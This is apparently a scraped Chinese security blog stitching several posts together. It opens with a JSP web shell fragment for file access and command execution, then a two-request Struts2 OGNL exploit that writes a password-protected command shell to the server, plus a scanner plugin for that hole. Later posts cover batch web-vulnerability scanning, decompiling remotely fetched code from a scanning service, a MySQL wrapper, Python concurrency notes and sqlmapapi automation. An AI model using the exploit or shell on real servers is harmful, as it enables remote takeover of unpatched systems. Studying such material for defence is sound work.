z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} }catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); %^>^|^<--^>^| >"D:/Tomcat/webapps/ROOT/website/images/right.jsp"

 

Below is a Struts2 bypass that works against targets that have not been patched in time.

1. Get the path:

POST /index.action?title=CasterJs HTTP/1.1
Host: www.0day5.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: cookie
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 256

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------5423a63046c50524a84963968721%

 

2. Write the shell to the path obtained above:

POST /index.action HTTP/1.1
Host: www.0day5.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: cookie
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 570

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new java.io.PrintWriter("/data/www/app/0day5/loggout.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"


-1
--------------------------5423a63046c50524a84963968721%

A plugin for a certain scanning platform:

    def verify(self):
        try:
            header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}
            data = {r'xxoo': '1'}
            file = {'test': ('1.jpg', StringIO('1'))}
            req = requests.Request('POST', self.option.url, headers=header, data=data, files=file).prepare()
            req.body = req.body.replace('xxoo', r'redirect:/${"\u007e\u007e"+#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")+"\u007e\u007e"}')
            req.headers['Content-Length'] = len(req.body)
            s = requests.Session()
            reponse = s.send(req, timeout=10, verify=False, allow_redirects=False)
            webroot = ''.join(re.findall(r'~~(.*?)~~', reponse.headers['Location'], re.S|re.I))
            if reponse.status_code == 302 and len(webroot):
                self.result.status = True
                self.result.description = "目标 {url} 存在st2命令执行漏洞, web路径为: {dir}".format(url=self.option.url, dir=webroot)
            else:
                self.result.status = False
                self.result.error = "不存在st2漏洞"
        except Exception, e:
            self.result.status = False
            self.result.error = str(e)

    def exploit(self):
        self.verify()

 

WVS_Patcher BatchScan tool

Published: September 23, 2015 // Categories: dev notes, python, reposted articles, misc // 3 Comments

Basic features

  • Submit scan tasks in batches
  • Allow parallel scans
  • Parse the scan results and send them to a mailbox

Technical analysis

The key technical points behind the features above are:

  • bottle.py for a simple web interface
  • Queue (multiprocessing.Queue)
  • subprocess calls to wvs_console.exe

1. Why bottle.py?

The script that drives wvs_console.exe naturally ended up in Python. To make user interaction easier, a simple web page was needed, and since the web side also has to talk to Python, a Python web framework was the obvious choice. For a simple page, the lightweight bottle.py was picked; there is essentially no learning curve.
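
A minimal sketch of what such a bottle.py front end could look like (the route name, form field, and queue wiring are illustrative assumptions, not the actual WVS_Patcher code):

# -*- coding: utf-8 -*-
# Hypothetical sketch of a bottle.py task-submission endpoint (not the real WVS_Patcher code).
from multiprocessing import Queue
from bottle import post, request, run

waiting_queue = Queue()          # unbounded queue of pending scan targets

@post('/add_task')               # illustrative route name
def add_task():
    target = request.forms.get('target')
    if not target:
        return 'missing target'
    waiting_queue.put(target)    # hand the task to the scanning dispatcher
    return 'queued: %s' % target

if __name__ == '__main__':
    run(host='0.0.0.0', port=8080)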

So a rough diagram of the program looks like this:

[Figure: wvs_patcher, an assistant for the WVS scanner]

2. Why use the Queue provided by multiprocessing instead of the plain Queue module?

The short answer: a plain queue object cannot be shared between a parent process and its child processes. To solve inter-process queue communication, multiprocessing wraps Queue; the usage is essentially the same as the standard Queue.
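
A quick sketch of the point: a multiprocessing.Queue handed to a child process can be read back in the parent, which a plain Queue.Queue cannot do:

# -*- coding: utf-8 -*-
# multiprocessing.Queue works across the parent/child process boundary.
from multiprocessing import Process, Queue

def worker(q):
    q.put('scan finished')       # the child process writes into the shared queue

if __name__ == '__main__':
    q = Queue()
    p = Process(target=worker, args=(q,))
    p.start()
    print q.get()                # the parent reads the child's message: 'scan finished'
    p.join()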

3. How do scans avoid blocking the process, while we still get notified as soon as a scan finishes?

Getting notified immediately after a scan finishes means some process has to block and wait for the program to end. For the user it is enough that the main process, i.e. the one serving the web interface, does not block. So the main process spawns a subprocess that runs wvs.py and then goes back to other work. wvs.py in turn uses subprocess to run wvs_console.exe, this time blocking; once the scanner has finished, it calls back into the main process's interface to say "I'm home".
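
Sketched under the assumption that the wrapper script is called wvs.py and that the web process exposes a callback URL (file names, paths, scanner arguments and the callback URL are all illustrative), the two halves might look like this:

# -*- coding: utf-8 -*-
# Illustrative sketch only; names, paths and URLs are assumptions.

# --- in the main (web) process: fire and forget ---
import subprocess
subprocess.Popen(['python', 'wvs.py', 'http://target.example.com/'])    # returns immediately

# --- in wvs.py: block on the scanner, then report back ---
import sys
import urllib
import subprocess

target = sys.argv[1]
subprocess.call(['wvs_console.exe', '/Scan', target])                   # blocks until the scan finishes
urllib.urlopen('http://127.0.0.1:8080/scan_done?target=' + urllib.quote(target))   # "I'm home"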

4. What role do the queues play in the program?

The program uses two queues, waiting_queue and scaning_queue. The size of scaning_queue is the number of scans allowed to run in parallel. waiting_queue is unbounded: tasks submitted from the web go straight into waiting_queue, wait there until scaning_queue has a free slot, move into scaning_queue, and release the slot once the scan finishes…
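
A stripped-down sketch of that dispatch logic (queue names follow the description above; the actual scan call is a stand-in):

# -*- coding: utf-8 -*-
# Sketch of the two-queue dispatch: a bounded queue caps the number of parallel scans.
from multiprocessing import Process, Queue

def scan(target, scaning_queue):
    # ... run wvs_console.exe against `target` here (blocking) ...
    scaning_queue.get()                       # scan finished: free a slot

def dispatcher(waiting_queue, scaning_queue):
    while True:
        target = waiting_queue.get()          # wait for a submitted task
        scaning_queue.put(target)             # blocks while all parallel slots are busy
        Process(target=scan, args=(target, scaning_queue)).start()

if __name__ == '__main__':
    waiting_queue = Queue()                   # unbounded: tasks submitted from the web
    scaning_queue = Queue(maxsize=3)          # bounded: at most 3 scans in parallel
    dispatcher(waiting_queue, scaning_queue)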

GitHub project page: WVS_Patcher

Notes on the enhanced version:
1. Use cases
1. You have an idle computer at home and want to put it to work hunting for bugs.
2. Your home connection has no dedicated IP, so you cannot hand it tasks at any time.

2. Changes:
Two new files, seed.py and sower.py, were added:
sower.py fetches data from a third-party site and dispatches the tasks to wvs_patcher.
seed.py encodes the sites to be scanned, making it easy to update the data on the third-party site.
How it works:
sower.py requests the page data from the third-party site every 20 seconds; when it detects an update, it automatically adds the new tasks to wvs_patcher (a rough sketch of this polling loop follows below).
seed.py ===================> third-party site <==================> sower.py
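
The polling side could look roughly like this (the note URL, the update check and the wvs_patcher endpoint are all assumptions; the real sower.py may differ):

# -*- coding: utf-8 -*-
# Hypothetical sketch of the sower.py polling loop; URLs and field names are assumptions.
import time
import hashlib
import requests

NOTE_URL = 'http://note.example.com/my-task-list'      # third-party notepad page (placeholder)
PATCHER_URL = 'http://127.0.0.1:8080/add_task'         # wvs_patcher submission endpoint (placeholder)

last_digest = None
while True:
    page = requests.get(NOTE_URL).text
    digest = hashlib.md5(page.encode('utf-8')).hexdigest()
    if digest != last_digest:                           # the note changed: new targets were added
        last_digest = digest
        for target in page.split():                     # assume one target per line/token
            requests.post(PATCHER_URL, data={'target': target})
    time.sleep(20)                                      # poll every 20 seconds, as described above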

 

3. Usage
1. Run wvs_patcher normally, following its instructions.
2. Edit the server and header parameters in sower.py to point at the third-party site (an online notepad such as xnote is recommended). Open a new window, run sower.py, and you can head off to work (the default server in the file is an xnote note entry; replace it with your own).
3. When you suddenly want to scan a site during a break at work, use seed.py to generate the data, copy it into the xnote note, and the target is added to the WVS scan tasks.
4. Any error during execution is reported by email to the callback mailbox configured in wvs_patcher.

wvs_patcher

Using uncompyle to get past marshal.loads

Published: September 21, 2015 // Categories: ops work, dev notes, linux, windows, python, misc // 4 Comments

I have recently been decoding something and got as far as

marshal.loads(zlib.decompress(urllib.urlopen(url).read()))

and could not take the next step. I was stuck for quite a while; today I happened to see an article about exactly this, so I am noting it down.

The main tool is the uncompyle library.
There are many enhanced forks online; when I get the chance I should dig into how it works so that I can improve it myself.
Some answers turned up on Stack Overflow (the more you search, the more you find…):
http://stackoverflow.com/questions/8189352/decompile-python-2-7-pyc
Download the library:
https://github.com/wibiti/uncompyle2
Install:
 

python setup.py install

————————— Deserialize and decompile —————————

import uncompyle2
import marshal
import zlib

co = marshal.loads(zlib.decompress("/x/x/x/x/x/x/xx/x/x/x"))

f = open('/tmp/testa', 'w')
uncompyle2.uncompyle('2.7.3', co, f)

No more suspense; here is the full script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urllib, urllib2, marshal, zlib, time, re, sys
import uncompyle2
#first request
#re = requests.get('https://www.bugscan.net/0a772492fbe89800')
#print re.content
#re = urllib2.urlopen('https://www.bugscan.net/0a772492fbe89800').read()
#print re
'''
#result of the first request
#!/usr/bin/env python
import imp
if imp.get_magic() != '\x03\xf3\r\n':
    print "Please update to Python 2.7.3 (http://www.python.org/download/)"
    exit()

import urllib, marshal, zlib, time, re, sys
for k in sys._getframe(1).f_code.co_consts:
    if not isinstance(k, basestring):
        continue
    m = re.match(r"http[s]*://[\w\.]+/[\?\w]*([0-9a-f]{16})", k)
    if m:
        _S = "https"
        _B = "www.bugscan.net"
        _U = m.group(1)
        _C = True
        count = 30
        while _C:
            if count <= 0:
                break
            try:
                exec marshal.loads(zlib.decompress(urllib.urlopen('%s://%s/bin/core_new' % (_S, _B)).read()))
            except:
                time.sleep(240)
            count = count - 1
        break

'''
#URL found in the result above
url = 'https://www.bugscan.net/bin/core_new'
data1 = marshal.loads(zlib.decompress(urllib.urlopen(url).read()))
f=open('./bugscan.py','w');
uncompyle2.uncompyle('2.7.3',data1,f);

References:

http://wcf1987.iteye.com/blog/1672542

http://www.blackh4t.org/archives/969.html

A MySQLdb Python wrapper class put together by 兔大侠

Published: September 13, 2015 // Categories: dev notes, work log, ops work, code study, linux, python, windows, mysql // No Comments

One thing I have never figured out: Python is so popular and mature, yet the way we use MySQL is still so primitive. Under Python 2 everyone still recommends the third-party MySQLdb module, written against by hand every time, with no authoritative wrapper class. Or maybe I am just ill-informed?

Based on the official documentation and some samples found online, I put together a MySQLdb wrapper class. It covers most of the commonly used functions and should be enough for everyday development.

#!/usr/bin/env python
# -*- coding: utf-8 -*- 
u'''A class wrapping commonly used MySQLdb functions

 Compiled by: 兔大侠 and friends (http://www.tudaxia.com)
 Date: 2014-04-22
 Source: from the internet, shared back to the internet :-)

 Note: this class assumes the MySQL-Python module is installed correctly.
 Official site: http://mysql-python.sourceforge.net/
'''

import MySQLdb
import time

class MySQL:
    u'''Wrapper class for commonly used MySQLdb functions'''
    
    error_code = '' # MySQL error code

    _instance = None # instance of this class
    _conn = None # database connection
    _cur = None # cursor

    _TIMEOUT = 30 # default timeout: 30 seconds
    _timecount = 0
        
    def __init__(self, dbconfig):
        u'Constructor: create the MySQL connection from the given connection parameters'
        try:
            self._conn = MySQLdb.connect(host=dbconfig['host'],
                                         port=dbconfig['port'], 
                                         user=dbconfig['user'],
                                         passwd=dbconfig['passwd'],
                                         db=dbconfig['db'],
                                         charset=dbconfig['charset'])
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            error_msg = 'MySQL error! ', e.args[0], e.args[1]
            print error_msg
            
            # if the preset timeout has not been exceeded, try to connect again
            if self._timecount < self._TIMEOUT:
                interval = 5
                self._timecount += interval
                time.sleep(interval)
                return self.__init__(dbconfig)
            else:
                raise Exception(error_msg)
        
        self._cur = self._conn.cursor()
        self._instance = MySQLdb

    def query(self,sql):
        u'Execute a SELECT statement'
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result

    def update(self,sql):
        u'Execute an UPDATE or DELETE statement'
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
            self._conn.commit()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result
        
    def insert(self,sql):
        u'Execute an INSERT statement. If the primary key is an auto-increment int, return the newly generated ID'
        try:
            self._cur.execute("SET NAMES utf8")
            self._cur.execute(sql)
            self._conn.commit()
            return self._conn.insert_id()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            return False
    
    def fetchAllRows(self):
        u'Return all result rows'
        return self._cur.fetchall()

    def fetchOneRow(self):
        u'Return one result row and move the cursor to the next; returns None after the last row'
        return self._cur.fetchone()
 
    def getRowCount(self):
        u'Get the number of result rows'
        return self._cur.rowcount
                          
    def commit(self):
        u'Commit the current transaction'
        self._conn.commit()
                        
    def rollback(self):
        u'Roll back the current transaction'
        self._conn.rollback()
           
    def __del__(self): 
        u'Release resources (called automatically by the garbage collector)'
        try:
            self._cur.close() 
            self._conn.close() 
        except:
            pass
        
    def  close(self):
        u'Close the database connection'
        self.__del__()
 

if __name__ == '__main__':
    '''Usage example'''
    
    # database connection parameters
    dbconfig = {'host':'localhost', 
                'port': 3306, 
                'user':'dbuser', 
                'passwd':'dbpassword', 
                'db':'testdb', 
                'charset':'utf8'}
    
    # connect to the database and create an instance of the class
    db = MySQL(dbconfig)
    
    # run a query
    sql = "SELECT * FROM `sample_table`"
    db.query(sql);
    
    # fetch the result rows
    result = db.fetchAllRows();
    
    # roughly equivalent to var_dump in PHP
    print result
    
    # loop over the rows
    for row in result:
        # access a field by index
        #print row[0]

        # loop over the columns
        for colum in row:
            print colum
 
    # close the database connection
    db.close()

 

The GIL, multiprocessing, and multithreading in Python

Published: September 7, 2015 // Categories: dev notes, code study, python, misc // No Comments

1 GIL (Global Interpreter Lock)

For some background on the GIL, see:

http://www.jeffknupp.com/blog/2012/03/31/pythons-hardest-problem/
http://www.oschina.net/translate/pythons-hardest-problem
https://news.ycombinator.com/item?id=5815567
http://www.dabeaz.com/GIL/

All else being equal, the execution speed of a Python program is tied directly to the "speed" of the interpreter: however much you optimize your own code, it still depends on how efficiently the interpreter runs it.
Today, multithreading is still the most common way to exploit multi-core systems. Even though threaded programming is a big step up from purely sequential programming, even careful programmers cannot extract the best possible concurrency from their code.
For any Python program running on CPython, no matter how many processors are available, only one thread is executing at any given time.
In fact, this question gets asked so often that Python experts have crafted a standard answer: "don't use threads, use processes." But that answer is even more confusing than the question.
The GIL protects access to things such as the current thread state and the heap-allocated objects used for garbage collection. There is nothing about the Python language itself that requires a GIL; it is an artifact of the CPython implementation, and other Python interpreters (and compilers) exist that do without one.
However you feel about the GIL, it remains one of the hardest technical challenges in the Python world. Understanding its implementation requires a thorough grasp of operating system design, multithreaded programming, C, interpreter design, and the CPython interpreter itself; those prerequisites alone keep many developers from studying the GIL more deeply.
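
To make this concrete, here is the classic CPU-bound counting experiment (in the spirit of the dabeaz.com/GIL material linked above); under CPython the threaded version is usually no faster, and often slower, than the sequential one:

# -*- coding: utf-8 -*-
# Rough illustration: a CPU-bound task gains nothing from two threads under CPython,
# because the GIL lets only one thread execute bytecode at a time.
import time
import threading

def count(n):
    while n > 0:
        n -= 1

N = 10000000

start = time.time()
count(N); count(N)
print 'sequential:  %.2fs' % (time.time() - start)

start = time.time()
t1 = threading.Thread(target=count, args=(N,))
t2 = threading.Thread(target=count, args=(N,))
t1.start(); t2.start()
t1.join(); t2.join()
print 'two threads: %.2fs (typically no faster, often slower)' % (time.time() - start)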

2 threading

The threading module provides a higher-level interface on top of the thread module; if threading is unavailable because thread is missing, dummy_threading can be used instead.

CPython implementation detail: In CPython, due to the Global Interpreter Lock, only one thread can execute Python code at once (even though certain performance-oriented libraries might overcome this limitation). If you want your application to make better use of the computational resources of multi-core machines, you are advised to use multiprocessing. However, threading is still an appropriate model if you want to run multiple I/O-bound tasks simultaneously.
 

import threading, zipfile

class AsyncZip(threading.Thread):
    def __init__(self, infile, outfile):
        threading.Thread.__init__(self)
        self.infile = infile
        self.outfile = outfile
    def run(self):
        f = zipfile.ZipFile(self.outfile, 'w', zipfile.ZIP_DEFLATED)
        f.write(self.infile)
        f.close()
        print 'Finished background zip of: ', self.infile

background = AsyncZip('mydata.txt', 'myarchive.zip')
background.start()
print 'The main program continues to run in foreground.'

background.join()    # Wait for the background task to finish
print 'Main program waited until background was done.'

2.1 Creating threads

import threading
import datetime

class ThreadClass(threading.Thread):
     def run(self):
         now = datetime.datetime.now()
         print "%s says Hello World at time: %s" % (self.getName(), now)

for i in range(2):
    t = ThreadClass()
    t.start()

2.2 Using thread queues

import Queue
import threading
import urllib2
import time
from BeautifulSoup import BeautifulSoup

hosts = ["http://yahoo.com", "http://google.com", "http://amazon.com",
        "http://ibm.com", "http://apple.com"]

queue = Queue.Queue()
out_queue = Queue.Queue()

class ThreadUrl(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, queue, out_queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.out_queue = out_queue

    def run(self):
        while True:
            #grabs host from queue
            host = self.queue.get()

            #grabs urls of hosts and then grabs chunk of webpage
            url = urllib2.urlopen(host)
            chunk = url.read()

            #place chunk into out queue
            self.out_queue.put(chunk)

            #signals to queue job is done
            self.queue.task_done()

class DatamineThread(threading.Thread):
    """Threaded Url Grab"""
    def __init__(self, out_queue):
        threading.Thread.__init__(self)
        self.out_queue = out_queue

    def run(self):
        while True:
            #grabs host from queue
            chunk = self.out_queue.get()

            #parse the chunk
            soup = BeautifulSoup(chunk)
            print soup.findAll(['title'])

            #signals to queue job is done
            self.out_queue.task_done()

start = time.time()
def main():

    #spawn a pool of threads, and pass them queue instance
    for i in range(5):
        t = ThreadUrl(queue, out_queue)
        t.setDaemon(True)
        t.start()

    #populate queue with data
    for host in hosts:
        queue.put(host)

    for i in range(5):
        dt = DatamineThread(out_queue)
        dt.setDaemon(True)
        dt.start()


    #wait on the queue until everything has been processed
    queue.join()
    out_queue.join()

main()
print "Elapsed Time: %s" % (time.time() - start)

3 dummy_threading (fallback for threading)

The dummy_threading module exactly replicates the interface of the threading module; if thread cannot be used, this module can serve as a replacement.

Usage:

try:
    import threading as _threading
except ImportError:
    import dummy_threading as _threading

4 thread

In Python 3 it is called _thread; you should prefer the threading module whenever possible.

5 dummy_thread (fallback for thread)

The dummy_thread module exactly replicates the interface of the thread module; if thread cannot be used, this module can serve as a replacement.

In Python 3 it is called _dummy_thread. Usage:

try:
    import thread as _thread
except ImportError:
    import dummy_thread as _thread

It is better to use dummy_threading instead.

6 multiprocessing (process-based parallelism with a thread-like interface)

https://docs.python.org/2/library/multiprocessing.html

The multiprocessing module creates child processes instead of threads, sidestepping the problems caused by the GIL.

from multiprocessing import Pool

def f(x):
    return x*x

if __name__ == '__main__':
    p = Pool(5)
    print(p.map(f, [1, 2, 3]))

6.1 The Process class
Processes are created with the Process class:

from multiprocessing import Process

def f(name):
    print 'hello', name

if __name__ == '__main__':
    p = Process(target=f, args=('bob',))
    p.start()
    p.join()

6.2 Inter-process communication
With a Queue:

from multiprocessing import Process, Queue

def f(q):
    q.put([42, None, 'hello'])

if __name__ == '__main__':
    q = Queue()
    p = Process(target=f, args=(q,))
    p.start()
    print q.get()    # prints "[42, None, 'hello']"
    p.join()

With a Pipe:

from multiprocessing import Process, Pipe

def f(conn):
    conn.send([42, None, 'hello'])
    conn.close()

if __name__ == '__main__':
    parent_conn, child_conn = Pipe()
    p = Process(target=f, args=(child_conn,))
    p.start()
    print parent_conn.recv()   # prints "[42, None, 'hello']"

6.3 Synchronization
With a lock:

from multiprocessing import Process, Lock

def f(l, i):
    l.acquire()
    print 'hello world', i
    l.release()

if __name__ == '__main__':
    lock = Lock()

    for num in range(10):
        Process(target=f, args=(lock, num)).start()

6.4 Shared state
Shared state should be avoided as much as possible.

With shared memory:

from multiprocessing import Process, Value, Array

def f(n, a):
    n.value = 3.1415927
    for i in range(len(a)):
        a[i] = -a[i]

if __name__ == '__main__':
    num = Value('d', 0.0)
    arr = Array('i', range(10))

    p = Process(target=f, args=(num, arr))
    p.start()
    p.join()

    print num.value
    print arr[:]

With a server process (Manager):

from multiprocessing import Process, Manager

def f(d, l):
    d[1] = '1'
    d['2'] = 2
    d[0.25] = None
    l.reverse()

if __name__ == '__main__':
    manager = Manager()

    d = manager.dict()
    l = manager.list(range(10))

    p = Process(target=f, args=(d, l))
    p.start()
    p.join()

    print d
    print l

The second approach supports more data types, such as list, dict, Namespace, Lock, RLock, Semaphore, BoundedSemaphore, Condition, Event, Queue, Value, and Array.

6.5 The Pool class
A process pool can be created with the Pool class:

from multiprocessing import Pool

def f(x):
    return x*x

if __name__ == '__main__':
    pool = Pool(processes=4)              # start 4 worker processes
    result = pool.apply_async(f, [10])    # evaluate "f(10)" asynchronously
    print result.get(timeout=1)           # prints "100" unless your computer is *very* slow
    print pool.map(f, range(10))          # prints "[0, 1, 4,..., 81]"

7 multiprocessing.dummy

The official documentation says only one sentence about it:

multiprocessing.dummy replicates the API of multiprocessing but is no more than a wrapper around the threading module.
multiprocessing.dummy is a full clone of the multiprocessing module; the only difference is that multiprocessing works with processes while the dummy module works with threads.
You can therefore pick the library according to the task: multiprocessing.dummy for I/O-bound work, multiprocessing for CPU-bound work.

import urllib2 
from multiprocessing.dummy import Pool as ThreadPool 

urls = [
    'http://www.python.org', 
    'http://www.python.org/about/',
    'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
    'http://www.python.org/doc/',
    'http://www.python.org/download/',
    'http://www.python.org/getit/',
    'http://www.python.org/community/',
    'https://wiki.python.org/moin/',
    'http://planet.python.org/',
    'https://wiki.python.org/moin/LocalUserGroups',
    'http://www.python.org/psf/',
    'http://docs.python.org/devguide/',
    'http://www.python.org/community/awards/'
    # etc.. 
    ]

# Make the Pool of workers
pool = ThreadPool(4) 
# Open the urls in their own threads
# and return the results
results = pool.map(urllib2.urlopen, urls)
#close the pool and wait for the work to finish 
pool.close() 
pool.join() 

results = [] 
for url in urls:
   result = urllib2.urlopen(url)
   results.append(result)

8 Closing notes

If you go with multithreading, prefer the threading module and keep the GIL's impact in mind.
If threads are not strictly necessary, use the multiprocessing module instead; it also supports a thread-backed variant via multiprocessing.dummy.
Work out whether the task at hand is I/O-bound or CPU-bound before choosing.


Detecting injection by combining a crawler with sqlmapapi

Published: September 5, 2015 // Categories: dev notes, code study, python, misc // No Comments

Lately I have been tinkering with some fiddly things: crawling and scanning, with the scanning handed off to sqlmapapi. There is not much material about it yet, but some can still be found.

"Using sqlmapapi.py for batch scanning in practice": http://drops.wooyun.org/tips/6653

Take a look at the sqlmapapi wrapper class from that article:

#!/usr/bin/python
#-*-coding:utf-8-*-
import requests
import time
import json


class AutoSqli(object):

    """
    Interact with the server started by sqlmapapi, using the sqlmapapi methods.

    By Manning
    """

    def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
        super(AutoSqli, self).__init__()
        self.server = server
        if self.server[-1] != '/':
            self.server = self.server + '/'
        self.target = target
        self.taskid = ''
        self.engineid = ''
        self.status = ''
        self.data = data
        self.referer = referer
        self.cookie = cookie
        self.start_time = time.time()

    # create a new scan task
    def task_new(self):
        self.taskid = json.loads(
            requests.get(self.server + 'task/new').text)['taskid']
        print 'Created new task: ' + self.taskid
        # got the taskid; everything else is driven by this taskid
        if len(self.taskid) > 0:
            return True
        return False

    # delete the scan task
    def task_delete(self):
        if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
            print '[%s] Deleted task' % (self.taskid)
            return True
        return False

    # start the scan task
    def scan_start(self):
        headers = {'Content-Type': 'application/json'}
        # the URL to scan
        payload = {'url': self.target}
        url = self.server + 'scan/' + self.taskid + '/start'
        #http://127.0.0.1:8557/scan/xxxxxxxxxx/start
        t = json.loads(
            requests.post(url, data=json.dumps(payload), headers=headers).text)
        self.engineid = t['engineid']
        if len(str(self.engineid)) > 0 and t['success']:
            print 'Started scan'
            return True
        return False

    # status of the scan task
    def scan_status(self):
        self.status = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
        if self.status == 'running':
            return 'running'
        elif self.status == 'terminated':
            return 'terminated'
        else:
            return 'error'

    # details (results) of the scan task
    def scan_data(self):
        self.data = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
        if len(self.data) == 0:
            print 'not injection:\t'
        else:
            print 'injection:\t' + self.target

    # scan settings, mainly setting the options
    def option_set(self):
        headers = {'Content-Type': 'application/json'}
        option = {"options": {
                    "smart": True,
                    ...
                    }
                 }
        url = self.server + 'option/' + self.taskid + '/set'
        t = json.loads(
            requests.post(url, data=json.dumps(option), headers=headers).text)
        print t

    # stop the scan task
    def scan_stop(self):
        json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']

    # kill the scan task process
    def scan_kill(self):
        json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']

    def run(self):
        if not self.task_new():
            return False
        self.option_set()
        if not self.scan_start():
            return False
        while True:
            if self.scan_status() == 'running':
                time.sleep(10)
            elif self.scan_status() == 'terminated':
                break
            else:
                break
            print time.time() - self.start_time
            if time.time() - self.start_time > 3000:
                error = True
                self.scan_stop()
                self.scan_kill()
                break
        self.scan_data()
        self.task_delete()
        print time.time() - self.start_time

if __name__ == '__main__':
    t = AutoSqli('http://127.0.0.1:8774', 'http://192.168.3.171/1.php?id=1')
    t.run()

Its workflow is:

    GET request to create a task and obtain a task id
    POST request against that task id to set the scan options
    POST request against that task id to start scanning the given url
    GET request against that task id to get the status
    GET request against that task id to get the test results
    GET request against that task id to delete the task
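
Stripped of the class wrapper, the same workflow against a locally running sqlmapapi server (python sqlmapapi.py -s -p 8775; the port and target below are placeholders) looks roughly like this:

# -*- coding: utf-8 -*-
# Bare-bones version of the workflow above against a local sqlmapapi server.
import json
import time
import requests

server = 'http://127.0.0.1:8775'
target = 'http://192.168.3.171/1.php?id=1'
headers = {'Content-Type': 'application/json'}

taskid = json.loads(requests.get(server + '/task/new').text)['taskid']            # 1. create a task
requests.post(server + '/option/' + taskid + '/set',
              data=json.dumps({'level': 1}), headers=headers)                     # 2. set options
requests.post(server + '/scan/' + taskid + '/start',
              data=json.dumps({'url': target}), headers=headers)                  # 3. start the scan

while json.loads(requests.get(server + '/scan/' + taskid + '/status').text)['status'] == 'running':
    time.sleep(10)                                                                # 4. poll the status

data = json.loads(requests.get(server + '/scan/' + taskid + '/data').text)['data']
print 'injection found' if data else 'no injection'                               # 5. read the results
requests.get(server + '/task/' + taskid + '/delete')                              # 6. delete the task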

Looking at the server class in lib/utils/api.py, you can see that interaction with the service happens by submitting data to the server. The endpoints fall into three groups:

    Users' methods
    Admin functions
    sqlmap core interact functions
The endpoints that accept data are as follows.

Users' methods

    @get("/task/new")
    @get("/task//delete")
Admin functions

    @get("/admin//list")
    @get("/admin//flush")
Core interact functions

    @get("/option//list")
    @post("/option//get")
    @post("/option//set")
    @post("/scan//start")
    @get("/scan//stop")
    @get("/scan//kill")
    @get("/scan//status")
    @get("/scan//data")
    @get("/scan//log//")
    @get("/scan//log")
    @get("/download///")
